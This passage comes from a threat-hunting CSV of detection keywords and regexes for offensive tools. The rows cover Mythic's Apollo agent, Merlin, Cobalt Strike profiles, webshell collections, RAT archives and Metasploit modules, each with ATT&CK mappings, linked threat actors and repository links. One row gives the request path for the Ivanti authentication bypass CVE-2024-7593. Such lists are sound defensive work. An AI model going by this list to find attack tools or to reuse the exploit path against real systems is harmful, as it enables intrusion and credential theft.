- T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","5368" "*/api_hooking.exe*",".{0,1000}\/api_hooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation 
tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","5369" "*/api0cradle/CVE-*",".{0,1000}\/api0cradle\/CVE\-.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","1","N/A","N/A","N/A","4","344","63","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z","5370" "*/Apollo.exe*",".{0,1000}\/Apollo\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5371" "*/Apollo.git*",".{0,1000}\/Apollo\.git.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5372" "*/Apollo/Agent/*",".{0,1000}\/Apollo\/Agent\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5373" 
"*/ApolloInterop.*",".{0,1000}\/ApolloInterop\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5374" "*/ApolloInterop/*",".{0,1000}\/ApolloInterop\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5375" "*/apollon-all-x64*",".{0,1000}\/apollon\-all\-x64.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","N/A","8","1","21","7","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z","5376" "*/apollon-main.zip*",".{0,1000}\/apollon\-main\.zip.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","N/A","8","1","21","7","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z","5377" "*/apollon-selective-x64*",".{0,1000}\/apollon\-selective\-x64.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","1","N/A","N/A","8","1","21","7","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z","5378" 
"*/ApolloTest.exe",".{0,1000}\/ApolloTest\.exe","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5379" "*/app/bin/merlinAgent*",".{0,1000}\/app\/bin\/merlinAgent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","5380" "*/AppProxyC2.git*",".{0,1000}\/AppProxyC2\.git.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","1","N/A","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","5387" "*/apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers*",".{0,1000}\/apps\/zxtm\/wizard\.fcgi\?error\=1\&section\=Access\+Management\%3ALocalUsers.{0,1000}","offensive_tool_keyword","POC","Ivanti Authent Bypass CVE-2024-7593 - Successful exploitation could lead to authentication bypass and creation of an administrator user","T1078 - T1136 - T1078.001","TA0006 - TA0004 - TA0005","N/A","N/A","Credential Access","https://x.com/mthcht/status/1823463842459848906","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5388" "*/Aqua Server Editor.exe*",".{0,1000}\/Aqua\sServer\sEditor\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - 
T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5389" "*/aquasecurity/cloudsploit*",".{0,1000}\/aquasecurity\/cloudsploit.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua - Cloud Security Scans","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","5390" "*/AquaServer.exe*",".{0,1000}\/AquaServer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5391" "*/Aquates Rat.exe*",".{0,1000}\/Aquates\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5392" "*/arabicspy.php*",".{0,1000}\/arabicspy\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5393" "*/Arbitrium-RAT.git*",".{0,1000}\/Arbitrium\-RAT\.git.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","1","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","5394" "*/Ares.git",".{0,1000}\/Ares\.git","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","1","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","5395" "*/ares.py *",".{0,1000}\/ares\.py\s.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","5396" "*/ArgFuscator.zip*",".{0,1000}\/ArgFuscator\.zip.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","1","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","5397" 
"*/args_spoofing-rs.exe*",".{0,1000}\/args_spoofing\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","5398" "*/armitage.git*",".{0,1000}\/armitage\.git.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","1","N/A","N/A","N/A","2","129","32","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z","5399" "*/arp_scanner.*",".{0,1000}\/arp_scanner\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5400" "*/arp_spoof/*",".{0,1000}\/arp_spoof\/.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","5401" "*/arsenal.git*",".{0,1000}\/arsenal\.git.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","5402" "*/arsenal-1.1.0.zip*",".{0,1000}\/arsenal\-1\.1\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","5403" 
"*/arsenal-1.2.0.zip*",".{0,1000}\/arsenal\-1\.2\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","5404" "*/arsenal-1.2.1.zip*",".{0,1000}\/arsenal\-1\.2\.1\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","5405" "*/arsenal-master.zip*",".{0,1000}\/arsenal\-master\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","5406" "*/artifactor.py*",".{0,1000}\/artifactor\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","5407" "*/ase_docker/*",".{0,1000}\/ase_docker\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 
- T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","N/A","10","10","304","53","2024-11-24T16:29:36Z","2018-02-12T16:23:23Z","5408" "*/Ask4Creds.git*",".{0,1000}\/Ask4Creds\.git.{0,1000}","offensive_tool_keyword","Ask4Creds","Prompt User for credentials","T1056 - T1071","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Leo4j/Ask4Creds","1","1","N/A","N/A","8","1","1","0","2024-03-20T17:09:21Z","2023-11-12T15:21:40Z","5409" "*/Ask4Creds.ps1*",".{0,1000}\/Ask4Creds\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","5410" "*/Ask4Creds.ps1*",".{0,1000}\/Ask4Creds\.ps1.{0,1000}","offensive_tool_keyword","Ask4Creds","Prompt User for credentials","T1056 - T1071","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Leo4j/Ask4Creds","1","1","N/A","N/A","8","1","1","0","2024-03-20T17:09:21Z","2023-11-12T15:21:40Z","5411" "*/asleap.exe*",".{0,1000}\/asleap\.exe.{0,1000}","offensive_tool_keyword","asleap","Exploiting a serious deficiency in proprietary Cisco LEAP networks","T1078 - T1557 - T1040","TA0006 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/joswr1ght/asleap","1","1","N/A","N/A","10","1","88","20","2021-06-21T00:13:17Z","2016-08-30T13:00:21Z","5412" "*/asn-query.nse*",".{0,1000}\/asn\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5413" "*/ASP.NET Web BackDoor.aspx*",".{0,1000}\/ASP\.NET\sWeb\sBackDoor\.aspx.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5414" "*/ASPJinjaObfuscator.git*",".{0,1000}\/ASPJinjaObfuscator\.git.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","1","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","5415" "*/asprox.profile*",".{0,1000}\/asprox\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","5416" "*/asprox.profile*",".{0,1000}\/asprox\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language 
to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","5417" "*/ASPXspy2.aspx*",".{0,1000}\/ASPXspy2\.aspx.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5418" "*/AspxSpy2014Final.aspx*",".{0,1000}\/AspxSpy2014Final\.aspx.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5419" "*/ASRenum.cpp*",".{0,1000}\/ASRenum\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules, actions, and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 